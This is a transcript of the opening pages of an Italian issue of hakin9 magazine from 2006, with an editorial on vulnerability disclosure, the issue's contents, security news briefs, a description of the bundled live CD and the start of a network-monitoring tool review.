hakin9 In breve hakin9.live Strumenti GFI Network Server Monitor 7 SwitchSniffer Prima pagina Sicurezza Wi-Fi WEP, WPA e WPA2 Focus Rootkit per Oracle

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "hakin9 In breve hakin9.live Strumenti GFI Network Server Monitor 7 SwitchSniffer Prima pagina Sicurezza Wi-Fi WEP, WPA e WPA2 Focus Rootkit per Oracle"

Transcript

1

2

3

4 hakin9 Segretario di redazione: Tomasz Nidecki Formaggio svizzero ben confezionato Ultimamente ho notato sulla lista di discussione Full Disclosure una discussione veramente molto interessante. È etico o no portare una notiza a pubblica conoscenza che riguarda una falla nella sicurezza? Lo scenario era il seguente il pentester aveva contattato una ditta informandola di aver trovato una falla nel suo software. Il produttore purtroppo non si era rivelato riconoscente; anzi, aveva reagito in un modo furioso visto che sapeva già da tanto dell'esistenza di questa falla e sperava che comunque nessuno se ne sarebbe accorto. Un tale comportamento suscita per forza un sospetto. Quante falle vengono lasciate nei software commerciali dai fabbricanti stessi che, essendone consapevoli, invece di risolverle le nascondo facendo finta di niente? C'è in particolare una cosa che non mi lascia in pace, perché tutte queste falle sono top secret? Per caso non vengono sfruttate dai produttori come gli spyware (vedi pagina 66)? Forse sono troppo sospettoso, ma non è venuto in mente anche a voi? La politica di nascondere gli errori e le falle nella sicurezza dall'opinione pubblica non è una novità per le enormi corporazioni come Microsoft oppure Oracle (vedi pagina 28). Ai clienti si parla degli standard di massima sicurezza, mentre in realtà questi clienti ricevono un pezzo di formaggio svizzero ben confezionato: in pellicola elegante ed etichetta colorata. All'esterno il prodotto è stupendo e fresco, mentre all'interno puzza ed è pieno di buchi. In tali condizioni vale veramente la pena di trattnersi dall'informare le comunità su Internet sull'esistenza di falle nei software di ditte potenti, se esse stesse non hanno nessun rimorso a mentire? Da un punto di vista vale la pena, non perché si tratti dei produttori, ma piuttosto pensando ai clienti. Una volta rivelata l'informazione sulle falle, gli utenti di un software bucato potranno diventare vittime di probabili attacchi. D'altro canto che cosa sarà se tutti i rischi legati all'esistenza delle falle continueranno ad essere nascosti? A quel punto i clienti continueranno ad essere attaccati ci saranno sempre quelli che sapendo delle falle non tappate le sfrutteranno a fini maligni. Finché non si parla del problema ad alta voce, gli utenti continuano ad essere incoscienti del rischio, visto che il produttore molto probabilmente non vorrà mai eliminare l'errore. Parlare delle falle o non parlarne per niente, secondo voi che cosa è peggiore? Io sono del parere che è giusto portare la notizia a pubblica conoscenza. Così come fa del resto la nostra rivista che con il presente numero lo dimostra di nuovo. Tomasz Nidecki tonid@hakin9.org In breve Marek Bettman Le informazioni più importanti dal mondo della sicurezza dei sistemi operativi. hakin9.live Jadwiga Rzepacka-Makara La descrizione del contenuto della versione attuale di hakin9.live allegata alla nostra rivista. Strumenti GFI Network Server Monitor 7 Stefan Lochbihler Uno strumento che permette agli amministratori di scansionare la rete alla ricerca di eventuali errori software o hardware. Consente di rivelare i problemi e di inviare degli avvisi prima ancora che gli utenti li riferiscano. SwitchSniffer Paweł Charnas Uno strumento semplice e gratuito destinato al monitoring delle reti di computer locali, dotato di meccanismi base per l'amministrazione e la rivelazione degli abusi. Prima pagina Sicurezza Wi-Fi WEP, WPA e WPA2 Guillaume Lehembre Presentiamo le debolezze dei metodi di crittografia usati nei collegamenti wireless. Inoltre spieghiamo nei dettagli le regole di funzionamento di WPA e WPA2. Mostriamo anche come superare la protezione di sicurezza WEP, WPA e WPA2. Focus Rootkit per Oracle Alexander Kornburst Grazie a questo articolo capirete il concetto di rootkit nei database. Mostriamo come scrivere semplice rootkit per Oracle. Inoltre presentiamo i metodi della protezione contro i rootkit dei db e le potenziali direzioni di sviluppo di questi metodi dell'attacco. La sicurezza in Windows Server Rudra Kamal Sinha Roy Lo scopo di questo articolo è analizzare la sicurezza in Windows Server Descriviamo quali meccanismi ha implementato Microsoft per proteggere meglio i suoi utenti e come si può superarli. Apprenderete le basi della protezione di Windows hakin9 Nº 2/2006

5 In pratica Il sistema IPS basato a Snort Michał Piotrowski Questo articolo spiega come a base di un computer semplice, tre interfacce ed il programma gratuito Snort si possa costruire il sistema di protezione contro gli attacchi (IPS). Vi mostreremo l'installazione e la configurazione di tale sistema. Tecniche Come superare un firewall di rete Oliver Karow Descriviamo i metodi per superare un firewall di rete. L'articolo vi mostrerà l'uso di questi metodi in pratica. Dall'articolo imparerete come configurare i firewall per impedire gli attacchi Metodi di infezione da spyware Christiaan Beek Presentiamo le tecniche più utilizzate dagli spyware per infettare il sistema Windows. Insegniamo come difendersi dalle minacce e come rimuovere i programmi indesiderati quando i pacchetti per l'eliminazione di spyware non riescono a farlo. Autenticazione del mittente protezione o minaccia Tomasz Nidecki Con il diffondersi dello spam, del phishing e dei joejob che minacciano sempre di più l intera comunità Internet, l autenticazione del mittente è diventato il problema principale della posta elettronica. Ma le soluzioni implementate come patch veloci e sbrigative per gestire i protocolli SMTP, notoriamente insicuri e non funzionanti, invece di risolvere i problemi ne creano di nuovi. Nel prossimo numero Daria Juchnowicz-Bierbasz Anticipazioni sugli articoli, che saranno pubblicati nel prossimo numero di hakin9. Editoriale Microsoft una nuova mariuoleria Tomasz Nidecki Dopo questa sua lettura capirete perchè la Microsoft rende la vita difficile agli utenti delle firme digitali. è pubblicato dalla Software-Wydawnictwo Sp. z o.o. L indirizzo di corrispondenza: Software-Wydawnictwo Sp. z o.o., ul. Piaskowa 3, Varsavia, Polonia Tel , Fax it@hakin9.org Direttore di pubblicazione: Jarosław Szumski Produzione: Marta Kurpiewska marta@software.com.pl Distribuzione: Monika Godlewska monikag@software.com.pl Market Manager: Joanna Bogusławska joannab@software.com.pl Segretario di redazione: Tomasz Nidecki CD-ROM: Witold Pietrzak Publishing: Anna Osiecka annao@software.com.pl Copertina: Agnieszka Marchocka Pubblicità: pubblicita@software.com.pl Abbonamenti: abbonamenti@software.com.pl Traduzione: Ilaria Scotti Rinaldi, Katarzyna Kruś Correzione: Adriano Toldo, Raffaele Giuliano, Marco Villa Distributore esclusivo per l Italia: Parrini&C. SpA Via Vitorchiano Roma Centr. Tel. 06/ Milano Viale Forlanini 23 Centr. Tel. 02/ In attesa di registrazione al Tribunale. Le persone interessate ad una collaborazione sono pregate di contattarci all indirizzo: cooperation@software.com.pl Se sei interessato ad acquistare la licenza per la pubblicazione delle nostre riviste, ti invitiamo a contattare: Monika Godlewska monikag@software.com.pl tel.: fax: Stampa: 101 Studio, Firma Tęgi La redazione fa tutto il possibile poiché le informazioni pubblicate sulla rivista ed i programmi presentati sui supporti allegati siano corretti, ma comunque non si assume alcuna responsabilità per gli effetti dati dal loro utilizzo; inoltre, non garantisce neanche il corretto funzionamento dei programmi shareware, freeware e public domain forniti con la rivista. Tutti i marchi presentati sulla rivista sono di proprietà delle rispettive ditte e sono stati utilizzati solo a scopo informativo. La redazione non fornisce assistenza tecnica legata all installazione né assistenza legata all utilizzo dei programmi inseriti nel CD allegato alla rivista. I dischi danneggiati in fase di trasporto/spedizione sono sostituiti dalla redazione. La redazione utilizza il sistema di publishing automatico Per la creazione dei grafici e diagrammi è stato utilizzato della società I dischi CD allegati alla rivista sono stati testati grazie ad AntiVirenKit, della società G DATA Software Sp. z o.o. La rivista hakin9 è pubblicata in 7 diverse lingue: PL IT CZ EN DE FR ES ATTENZIONE! La vendita del presente numero e dei numeri arretrati ad un prezzo inferiore di quanto indicato sulla copertina senza il consenso dell editore è considerata come un azione a suo danno e comporta dunque conseguenze a livello legale. Le tecniche presentate negli articoli possono essere utilizzate soltanto nelle proprie reti locali. La redazione non si assume la responsabilità per un uso scorretto delle tecniche proposte e per l eventuale perdita di dati da esso causata. hakin9 Nr 2/2006 5

6 In breve Una rivoluzione nelle protezioni e nell'identificazione La ditta australiana CSIRO ha elaborato la tecnologia DataTraceDNA, che permette di proteggere e di identificare i prodotti grazie all'utilizzo dei codici a barre chimici. DataTrace- DNA integra unici ed indelebili motivi di micromolecole con la struttura molecolare di materiali e di prodotti. Le micromolecole sono invisibili da un occhio umano, possono senza problemi essere interpretate come un codice a barre chimico, con l'utilizzo di un apposito lettore portatile. Il codice a barre chimico è molto complesso ed al tempo stesso molto difficile da falsificare da parte dei contraffattori. Inoltre, non può essere eliminato né cambiato, perché fa parte della struttura del materiale o del prodotto. Attualmente la ditta si è concentrata sull'integrazione della nuova tecnologia con cemento, legno, materiali pirotecnici, colle, vernici, imballaggi e polimeri, sostanze chimiche e confezioni farmaceutiche. I domini.eu non per gli Svizzeri In base alle normative della Comunità Europea gli abitanti della Svizzera non potranno registrare i loro indirizzi nel comune dominio europeo.eu. Nonostante questo paese sia situato proprio al centro dell'europa, il diritto di possedere gli indirizzi nel nuovo dominio europeo spetta soltanto ai paesi che fanno parte della Comunità Europea. Beat Fehr, il capo di una delle due aziende Internet svizzere, alle quali è stata assegnata la licenza per vendere gli indirizzi nel dominio.eu, è molto preoccupato per questa informazione. A suo parere, i consorzi svizzeri tra l'altro Nestle e Swatch perderanno i loro domini europei a beneficio di astuti imprenditori stranieri che registreranno in tutta fretta gli indirizzi con i nomi delle ditte menzionate. Egli ammette anche che il dominio stesso.eu dovrebbe essere assegnato a tutti i paesi del Vecchio Continente. Però i dibattiti condotti tra la Commissione Svizzera per la Comunicazione e la Commissione Europea non hanno portato ai risultati attesi. In situazione simile alla Svizzera, si sono trovati anche altri paesi europei che non fanno parte della Comunità Europea Islanda, Liechtenstein e Norvegia. Skype pericoloso La ditta Info-Tech, che si occupa di analisi nel settore IT, avverte che, ovunque abbiamo a che fare con soluzioni business, l'applicazione Skype dovrebbe essere senza indugio aggiunta alla lista delle applicazioni che non dovrebbero essere installate e tanto meno utilizzate. Skype è una delle imprese Internet con il maggiore sviluppo già adesso vanta 54 milioni di utenti in 225 paesi di tutto il mondo. È considerato uno dei leader di mercato praticamente in tutti i paesi in cui funziona. Circa 17 milioni di utenti registrati del programma Skype lo utilizzano per scopi business. Finché non entreranno in vigore specifiche di sicurezza più restrittive riguardanti questa soluzione, questi 17 milioni di utenti sono un ideale backdoor per gli intrusi dice un impiegato della Info-Tech. Secondo Info-Tech, i peccati cardinali di Skype sono: la codifica utilizzata in Skype ha carattere chiuso, quest'applicazione è molto vulnerabile ad attacchi di tipo man-inthe-middle, sono sconosciuti i meccanismi di gestione delle chiavi, la comunicazione a livello business tramite Skype può rendere la vita dei nostri utilizzatori più difficile, poiché molte istituzioni hanno aggiunto l'applicazione Skype ai loro libri neri, Skype non è compatibile con i firewall più diffusi, perciò un errore scoperto nell'applicazione oppure un attacco diretto all'applicazione stessa verrà senza problemi tralasciato da un tipico firewall. Da quando il conosciutissimo gigante mondiale delle aste Internet ebay, decise di comprare Skype un potentato nel mercato della telefonia Internet, tra gli specialisti per la sicurezza di rete si scatenò il pandemonio. L'olio sul fuoco lo gettò l'intervento di Joseph E. Sullivan (del reparto di ebay per la collaborazione con le aziende governative) durante la conferenza CyberCrime2003. Veramente i dati personali degli utenti di Skype sono facilmente accessibili e la loro privacy minacciata? Scott Granneman sul SecurityFocus cita l'enunciato, ferale per gli utenti di Skype, di un impiegato di ebay dalla conferenza CyberCrime2003: Studiando le questioni legate alle truffe su ebay ho imparato che la mia ditta esercita probabilmente la politica più favorevole ed aperta riguardo la condivisione delle informazioni private dei nostri utenti; basta rappresentare una qualsiasi agenzia che si occupa dell'applicazione della legge e, inviandoci via fax su carta intestata una domanda di richiesta di informazioni sull'anagrafica di qualsiasi utente del portale di aste, tutti i particolari della sua attività verranno inviati. Tutto questo senza alcun mandato giudiziario! L'instant messenger Skype è presentato dai suoi autori come pienamente sicuro (codifica di conversazione con algoritmo AES, e RSA per negoziare una chiave) però, dato che il suo codice sorgente non è stato svelato, possiamo soltanto ipotizzare fidandoci sulla parola dei programmatori, che le informazioni trasmesse via Skype sono conosciuti soltanto a noi ed al ricevente... Sapendo quanto è facile ricavare i dati personali di qualsiasi utente del portale ebay, il fatto che il nuovo proprietario di Skype eserciti una politica della protezione di dati personali così debole non solo provoca una generale preoccupazione tra gli specialisti per la sicurezza IT, ma incute anche spavento tra gli utenti comuni. Per chi non vuole rischiare di lasciare i propri dati personali nelle mani di persone inidonee, cercare un'alternativa per la telefonia Internet VoIP servita da Skype non è poi molto difficile. Oltre a Skype, sul mercato va preso in considerazione praticamente soltanto un instant messenger Gizmo. Anche questo utilizza la codifica forte, però possiede il vantaggio che per la comunicazione usa il protocollo aperto SIP e XMMP/Jabber (comunicazione testuale). 6 hakin9 Nº 2/2006

7 In breve Un nuovo worm una minaccia per Linux In Internet si sta diffondendo un nuovo worm, con il nome Lupper, il quale attacca i computer che lavorano con sistema Linux. Sulle macchine infette il worm lascia aperte delle backdoor, concedendo in questo modo ai cracker una possibilità di prendere il controllo remoto sul sistema. La falla che permette al worm l'attività nociva si trova in XML- RPC per PHP, quindi la minaccia riguarda soprattutto i computer sui IT UNDERGROUND 2006 L 'accesso alla rete globale, sempre più ampio ed illimitato, ha fatto sì che si debba far fronte a minacce che fino a poco tempo fa si potevano incontrare soltanto nelle visioni futuristiche di scrittori e registi. Le capacità di calcolo sempre crescenti dei computer, i collegamenti a banda larga appartenenti alla società di Internet costringono le persone responsabili per la sicurezza della rete ad una costante vigilanza, alla capacità di identificare e di neutralizzare le minacce. Tutti questi temi verranno discussi durante la Conferenza IT UNDERGROUND 2006, la più grande in Europa. Acquisiremo tra l'altro conoscenze sui metodi d'attacco, sui modi di difesa, sulla sicurezza delle reti senza fili e sull'analisi post-intrusione. Gli argomenti delle sessioni: Attacchi alle applicazioni UNIX, Attacchi alle applicazioni Windows, Tecniche per spezzare le protezioni, Analisi del codice binario e sorgente, Sicurezza dei servizi Web Services, Sicurezza dei database, Sicurezza dell'hardware, Scansione ed analisi della rete, Anonimato e privacy in Rete, Crittografia, Hardening dei sistemi UNIX, Hardening dei sistemi Windows, Analisi post-intrusione dei sistemi Unix/Linux, quali sono state installate le applicazioni WordPress, Drupal, PostNuke, o TikiWiki. Per fortuna, finora, sono state osservate pochissime infezioni riuscite, e la società McAfee definisce basso il livello di rischio legato all'infezione con il worm Lupper. D'altro canto la Symantec definisce questo rischio come medio anche se afferma che il numero delle infezioni rilevate è per adesso molto limitato. Analisi post-intrusione dei sistemi Windows, Sicurezza delle reti senza fili (Wi- Fi, Bluetooth), Rootkits e backdoors nei sistemi UNIX, Rootkits e backdoors nei sistemi Windows, Canali nascosti e steganografia di rete, Analisi di worms, malware e spyware, Certificati di sicurezza - PKI, Reverse Engineering, Ingegneria sociale, Aspetti giuridici, BYOL. Una parte delle conferenze si terrà in forma BYOL (Bring Your Own Laptop). I partecipanti potranno avviare i propri computer da un CD appositamente preparato contenente le distribuzioni hakin9.live, e poi fare un'intrusione ad una rete di test utilizzando le tecniche descritte dal conferenziere o difendersi dall'attacco effettuato dagli altri partecipanti. Le prossime Conferenze: IT UNDERGROUND 2006, aprile Gran Bretagna, IT UNDERGROUND 2006, giugno Spagna, IT UNDERGROUND 2006, settembre Italia. Informazioni dettagliate riguardanti le imprese si possono trovare su: La Microsoft apre le specifiche dei file MS Office Il gigante di Redmond ha annunciato che renderà accessibile il formato dei file Office XML ed ha presentato la domanda all'organizzazione internazionale per la standardizzazione ECMA per far riconoscere questo formato come uno standard di settore. Sembra che la Microsoft abbia finalmente capito che il suo atteggiamento intransigente riguardo la questione dell'apertura di alcuni formati dei file può essere molto svantaggioso. Specialmente a proposito dei file dal pacchetto da ufficio, dove è sorto un forte concorrente, cioè il formato OpenDocument. Microsoft ha annunciato la pubblicazione degli speciali strumenti che permetteranno la conversione dei dati memorizzati nel vecchio formato ai file Office XML. Le lettere falsificate dalla FBI austriaca Un equivalente austriaco alla FBI americana Ufficio Federale Criminale avverte riguardo ad i cui autori si spacciano per tale Ufficio. Le ricevono soprattutto gli abitanti di Austria, Germania e Svizzera, ma anche di altri paesi europei. Nel contenuto della lettera il ricevente può leggere che sta utilizzando software pirata. Nel file allegato alla lettera si trova una delle versioni del virus Sober. L'Ufficio Federale Criminale mette in guardia dall'aprire l'allegato ed informa che non ha niente in comune con di questo tipo. ISSA ormai in Polonia Dal novembre dell'anno scorso anche nel nostro paese funziona la filiale dell'organizzazione ISSA (International Security Systems Association). Proprio allora sono stati terminati i lavori legati alla registrazione di ISSA Polska. L'associazione radunerà gli specialisti che si occupano delle questioni di sicurezza informatica, tra questi anche il personale amministrativo delle ditte di questo settore. Uno dei modi per organizzare meglio quest'ambiente saranno incontri mensili durante i quali verranno trattati ed analizzati i più importanti problemi legati alla sicurezza IT. Può darsi che la collaborazione aiuti a trovare più facilmente il modo per risolvere alcuni problemi. hakin9 Nº 2/2006 7

8 In breve Un altro errore critico in Internet Explorer La società britannica Computer Terrorism ha presentato un codice malizioso che sfrutta una nota falla in Internet Explorer per prendere il controllo sul computer. La falla è conosciuta dal 31 maggio di quest'anno. Inizialmente è stata definita come poco pericolosa, perché permetteva appena di effettuare un attacco di tipo DoS (denial-of-service). Adesso, dopo la prova data dai Britannici che questa falla permette di prendere il controllo su un computer, viene valutata come critica. È il più alto grado di pericolosità possibile. L'errore deriva dal modo di gestione del codice JavaScript da parte del browser. Se un internauta dovesse visitare una pagina Web adeguatamente preparata, il suo autore potrà esegure sul suo computer qualsiasi codice. Gli esperti consigliano di disattivare in Internet Explorer la gestione di JavaScript (provocando notevoli disagi nell'utilizzo di Rete), oppure di utilizzare un altro browser. Windows via Internet La ditta Microsoft ha annunciato che una parte delle applicazioni dell'ambiente Windows verrà spostata dai dischi rigidi ad Internet. Secondo Bill Gates, il nuovo sito Internet, chiamato Windows Live, permetterà di utilizzare molte applicazioni Windows in qualsiasi posto e momento. Il fondatore della Microsoft ha sottolineato però che, sia il nuovo servizio che la gemella Windows Office, non sostituiranno completamente il software installato sui dischi rigidi. Il nuovo sito Internet dovrà facilitare l'accesso a molte applicazioni Windows da parte di oltre 28 milioni di clienti del settore delle piccole e medie industrie di tutto il mondo, offrendo le estensioni delle applicazioni standard di Office ed alcuni nuovi servizi, che di solito stanno fuori dalla portata finanziaria dei clienti di questo settore. Office Live per adesso verrà fornito ad un ristretto gruppo di clienti. Windows Live verrà offerto per abbonamento e già adesso viene considerato come la risposta della Microsoft alle nuove idee delle società Google e Yahoo. Speriamo che il nuovo prodotto del gigante di Redmond sia fornito di protezioni migliori in confronto ai suoi fratelli maggiori. Una falla in itunes Secondo le ultime notizie dalla ditta eeye, nelle protezioni del software itunes è stato scoperto un grave errore, che permette di prendere il controllo del computer dell'utente. Fino ad ora mancano commenti a riguardo da parte del consorzio Apple. Sulla pagina di eeye si può leggere che l'errore in itunes permette un avvio non autorizzato di codice su una macchina attaccata. I dettagli riguardo alla falla non sono stati svelati. È noto che il problema delle falle nel codice riguarda diverse versioni del programma compresa la più recente, indicata dal numero 6. Il problema riguarda esclusivamente le versioni per il sistema Windows. La sicurezza d'internet minacciata Un team di scienziati finlandesi dell'università di Oulu ha scoperto una grave falla nell'implementazione del protocollo ISAKMP (Internet Security Association and Key Management Protocol), utilizzata nei prodotti di Cisco e di Juniper Networks. La falla scoperta è tanto seria che gli esiti delle ricerche degli scienziati finlandesi hanno guadagnato immediatamente la celebrità, grazie al Centro Nazionale Britannico per la Coordinazione della Sicurezza di Rete e grazie al CERT finlandese. In modo particolare sono minacciate le barriere di rete delle ditte Cisco Systems e Juniper Networks. Entrambi i consorzi sono già stati avvertiti della nuova minaccia. I rappresentanti della ditta Cisco hanno ammesso che un pacchetto adeguatamente preparato può causare un momentaneo riavvio dei dispositivi, che permette un attacco di tipo DoS. La ditta fornisce già aggiornamenti gratuiti del suo software. Tra i prodotti minacciati della ditta ci sono le applicazioni Cisco IOS, Cisco PIX Firewall, Cisco Firewall Services Module, Cisco VPN 3000 Series Concentrators e Cisco MDS Series SanOS. Anche il consorzio Juniper ha reagito alla minaccia notificata, annunciando che l'intero software della società messo in circolazione dopo il 28 luglio possiede ormai le adeguate protezioni. Tra i prodotti, che si sono trovati sulla lista dei più minacciati, ci sono i router della serie M, T, J ed E, ed anche la maggior parte delle versioni del software Junos e JunoSE Security. La sicurezza dei browser Internet produttori dei browser Internet più I diffusi hanno dibattuto insieme sul modo in cui difendersi dalle minacce che arrivano da Internet. Gli impiegati di Microsoft (Internet Explorer), di Mozilla Foundation (Firefox), di Opera Software (Opera) ed i creatori di Konqueror si sono incontrati a Toronto durante una sessione congiunta organizzata dagli sviluppatori di KDE. Il tema principale dei dibattiti è stata l'elaborazione di modi per far rendere possibile il riconoscimento da parte dei browser dei siti degni di fiducia e di quelli che creano una minaccia. Inoltre si è riflettuto anche sul modo di proteggere la tecnologia pop-up, affinché i cyberdelinquenti non riescano a sfruttarla per strappare i dati personali. Una delle soluzioni proposte è stato il cambiamento del colore della barra d'indirizzo, dipendentemente dal livello di fiducia e dal livello delle protezioni utilizzate sul sito visitato. Sulla barra dovrebbero apparire anche le icone che indicano l'attivazione della trasmissione codificata di dati da parte del sito. Inoltre, ogni finestra aperta visualizzerebbe l'indirizzo dal quale è stato scaricato il suo contenuto. Questo principio riguarderebbe anche i finestrini pop-up o i moduli. Non è noto, però, se i modi di protezione elencati verranno applicati in tutti i browser. I rappresentanti di Firefox e di Konqueror hanno costatato infatti che possono soltanto consigliare, ma non imporre, qualcosa alle persone che lavorano su questi programmi. 8 hakin9 Nº 2/2006

9 In breve Una reclusione pluriennale per un cyberdelitto Due Nigeriani sono stati condannati a diversi anni di reclusione per la più grande vicenda nella storia di questo paese legata al furto di denaro tramite Internet. Emmanuel Nwude passerà in prigione 25 anni, mentre Nzeribe Okoli 12, dopo aver rubato da una banca brasiliana 242 milioni di dollari. Inoltre, dovranno pagare 121,5 milioni di dollari di risarcimento alle vittime del delitto, tra le quali si annoverano i clienti del Banko Noroeste di Sao Paulo. L'attività dei Nigeriani ha condotto la banca al fallimento. Il terzo degli accusati, Amaka Anajemba, ha accettato di pagare 48,5 milioni di dollari di risarcimento ed è stato condannato a due anni e mezzo di reclusione. I delinquenti hanno spillato i soldi dalla banca offrendo ai suoi impiegati grandi provvigioni in cambio della mediazione in una fittizia costruzione di un aeroporto nella capitale della Nigeria, Abuja. Le frodi di questo tipo soltanto negli Stati Uniti fruttano, Le nuove protezioni dei film Durante la conferenza dell'organizzazione DVD Forum, che si è svolta a Parigi, è stata presentata una tecnologia, il compito della quale sarà la protezione dalla riproduzione e divulgazione non autorizzata dei film venduti sui dischi HD-DVD. Il sistema delle filigrane sonore è stato presentato da Allan Bell, del consorzio Warner Brothers. Tutti i lettori HD-DVD verranno forniti di un sensore che verificherà le filigrane, inudibili da un orecchio umano, racchiuse nella colonna sonora dei film. Tramite la nuova soluzione verranno protette tutte le maggiori produzioni lanciate sugli schermi dei cinema. Quando un lettore scoprirà il codice nascosto, considererà il supporto una copia illegale e renderà impossibile la sua lettura su tale dispositivo. In questo modo il settore cinematografico vuole eliminare le copie pirata dei film registrati con una cinepresa digi- a danno degli ingenui, circa 1 milione di dollari al giorno così succede già da molti anni e questo fenomeno si intensifica sempre di più. Per la Nigeria è il terzo, prendendo in considerazione i ricavi, ramo dell'industria. Attualmente in molti paesi del mondo ogni lettera, o quasi, proveniente dalla Nigeria, dalla Repubblica Sudafricana, dallo Zimbabwe, Angola, Sierra Leone o dalla Costa d'avorio, viene considerata come un preambolo per spillare soldi. Dal 1999 in Nigeria funziona un agenzia del Secret Service Americano però, nonostante questa e le centinaia di arresti effettuati, il business illegale funziona su scala sempre più grande e coinvolge sempre più paesi del mondo. Purtroppo risulta che il governo nigeriano non intende collaborare a combattere quest'attività finora il tribunale nigeriano non ha condannato nessuno ai sensi del 419 CP e nessuna delle vittime ha ottenuto un risarcimento. tale durante gli spettacoli di cinema in anteprima. I dischi HD-DVD per l'uso domestico conteranno anch'essi una filigrana sonora, che, sarà però diversa dalla versione da cinema. Verranno rilevate le copie dei film sia bruciate in masterizzatori DVD, sia riprese tramite una cinepresa digitale dallo schermo di un televisore. Dopo aver scoperto una copia illegale la protezione spegnerà il lettore. Inoltre, poco tempo fa, al blocco dei sostenitori del formato HD-DVD si è unita anche la Microsoft, il che permette di supporre che le nuove tecnologie di protezione verranno implementate anche in Windows. Speriamo che il sistema di protezione basato sulle filigrane sonore non possieda delle proprietà nascoste, come il software di Sony per la protezione dei dischi audio, o la maggior parte delle stampanti laser prodotte sul territorio degli Stati Uniti. BIN GigaCon La Sicurezza e l'infallibilità dei Sistemi Informatici la più grande conferenza in Europa Centrale dedicata alla sicurezza ed all'infallibilità dei sistemi informatici già quest'anno si svolgerà anche in Germania ed in Francia. Finora in Polonia hanno avuto luogo sei edizioni di quest'incontro, invece nella Repubblica Ceca tre. Ogni incontro raduna migliaia di partecipanti e decine di ditte celebri che presentano le loro soluzioni. La decisione presa dagli organizzatori della conferenza, ossia dalla ditta Software Konferencje, di organizzare l'incontro in Francia ed in Germania è un evento molto importante per tutte le persone che si occupano quotidianamente della sicurezza dei sistemi informatici. Ogni edizione consta di oltre 30 conferenze e di 3 sessioni tematiche parallele, accompagnate inoltre dalle sessioni tecniche. La partecipazione è gratuita. La rivista hakin9 era presente durante tutte le edizioni sia in Polonia che nella Repubblica Ceca. Ci saremo anche in Germania ed in Francia. Vi invitiamo. Chi attacca le reti militari americane? Il governo cinese assume hacker che effettuano intrusioni alle reti militari americane. Gli esperti hanno rivelato informazioni su un gruppo di persone che lavorano per il governo di Pechino. Gli hacker, che hanno la loro sede probabilmente nella provincia di Guangdong, hanno rubato molti documenti segreti americani. Tra le informazioni rubate ci sono particolari riguardanti la costruzione di aerei e il software per pianificare i percorsi dei voli. Secondo l'opinione di Alan Paller, il direttore di SANS Institute, che ha studiato i casi delle intrusioni e dei furti dei dati segreti, il gruppo di hacker conta 20 persone. Il governo americano ha chiamato il gruppo Titan Rain e per combatterlo ha ingaggiato tra l'altro l'hacker soprannominato Shawni Carpenter, che è riuscito a fare un'intrusione nei computer utilizzati dai Cinesi. In Rete si è diffusa anche l'opinione che l'intera vicenda sia stata montata dagli Americani in cerca di una scusa per monitorare, in modo legale, l'attività della Cina nel campo informatico. hakin9 Nº 2/2006 9

10 hakin9.live Contenuto del CD Nel disco allegato alla rivista si trova hakin9.live (h9l) nella versione 2.9-ng la distribuzione bootable di Linux che contiene strumenti utili, documentazione, tutorial e materiali supplementari agli articoli. Per cominciare il lavoro con hakin9.live basta avviare il computer da CD. Dopo l'avvio del sistema è sufficiente inserire il nome dell'utente hakin9 senza fornire password. I materiali supplementari sono stati collocati nelle seguenti directory: doc la documentazione nel formato HTML, hit hit del presente numero: Shadow Security Scanner, un ottimo scanner di vulnerabilità la versione completa per 5 indirizzi IP. Per ottenere i codici che rendono accessibile la versione gratuita di questo programma occorre installare la versione del programma presente sul disco hakin9.live ed inviare all indirizzo support@safety-lab.com un messaggio con il titolo Hakin9-Safety-lab SSS offer. La promozione è valida fino al 31 maggio 2006, art i materiali supplementari agli articoli: listing, script, programmi indispensabili, tut i tutorial, add i libri ed altri documenti nel formato PDF (tra l'altro Using PGP/GnuPG and S/MIME with , ICMP attacks against TCP, Host Fingerprinting and Firewalking With hping, Writing Stack Based Overflows on Windows (4 pats + Examples), rfc il set degli documenti RFC aggiornati. I materiali archiviali sono stati collocati nelle directory _arch, invece i nuovi nelle directory principali seguendo la struttura menzionata sopra. Nel caso di esplorazione del disco dall'interno di hakin9.live avviato, la struttura di sopra è accessibile dalla sottodirectory /mnt/cdrom. La versione 2.9-ng h9l l'abbiamo costruita in base alla distribuzione Gentoo Linux ed agli script livecd- tools. Gli strumenti inaccessibili nel repository Gentoo vengono installati dai pacchetti collocati nella directory /usr/local/portage o vengono registrati alla directory /usr/local/bin. Nel confronto con h9l 2.8-ng abbiamo cambiato la versione del kernel (attualmente con le patch gentoo-sources r4). Abbiamo aggiornato i pacchetti per le versioni i più nuove e stabili. Abbiamo aggiunto i nuovi driver per le carte wireless PCI e USB. Nella versione attuale di h9l compaiono tra l'altro i programmi: ap-utilis la raccolta di strumenti per la configurazione degli Access Point, mrtg la supervisione della carico dei collegamenti di rete, ekg2 comunicatore di consolle che serve tra l'altro i protocoli come Jabber. Inoltre il programma Nessus è stato aggiornato alla versione Nel nuovo h9l si trova il programma d'installazione (la versione modificata degli script di Knoppix). Dopo l'installazione sul disco per installare il software supplementare si può utilizzare portage (il comando emerge). L'ambiente grafico di h9l è Fluxbox con il file manager ROX. Tutorial e documentazione La documentazione consiste tra l'altro nei tutorial preparati dalla redazione che contengono esercizi pratici. Premettiamo che l'utente utilizzi hakin9.live. Grazie a questo eviterà i problemi legati alle diverse versioni dei compilatori, alla differente localizzazione dei file di configurazione, oppure alle opzioni indispensabili per l'avvio del programma in un dato ambiente. Fig. 1: Sempre più strumenti utili Fig. 2: Shadow Security Scanner 10 hakin9 Nº 2/2006

11 Se non riesci a leggere il contenuto del CD, e non presenta danni meccanici, controllalo almeno su due CD driver. In caso di problemi con il CD scrivete all indirizzo: cd@software.com.pl

12 GFI Network Server Monitor 7 Strumenti Sistema operativo: Windows NT4/2000/XP/2003 Licenza: Commerciale con versione di prova di 10 o 30 giorni Destinazione: Monitoraggio della rete e del server alla ricerca di errori Homepage: GFI Network Server Monitor è uno strumento che permette agli amministratori di scansionare la rete alla ricerca di eventuali errori software o hardware. Consente di rilevare i problemi e di inviare degli avvisi prima ancora che gli utenti li riferiscano. Partenza veloce: Supponiamo di essere un amministratore di una rete formata da un server Win 2003 e da un server SUSE con un servizio HTTP, SSH e FTP. Stiamo cercando un software che sia in grado di monitorare costantemente i nostri servizi e di informarci immediatamente della presenza di un errore. Il GFI Network Server Monitor è quello che stiamo cercando. Incominciamo a impostare alcuni controlli basilari sul sistema SUSE. A tale scopo è necessario creare una nuova cartella che conterrà le nostre regole e impostazioni per il monitoraggio del sistema. Selezioniamo l'opzione Monitoring Checks Configuration (Configurazione dei controlli di monitoraggio) 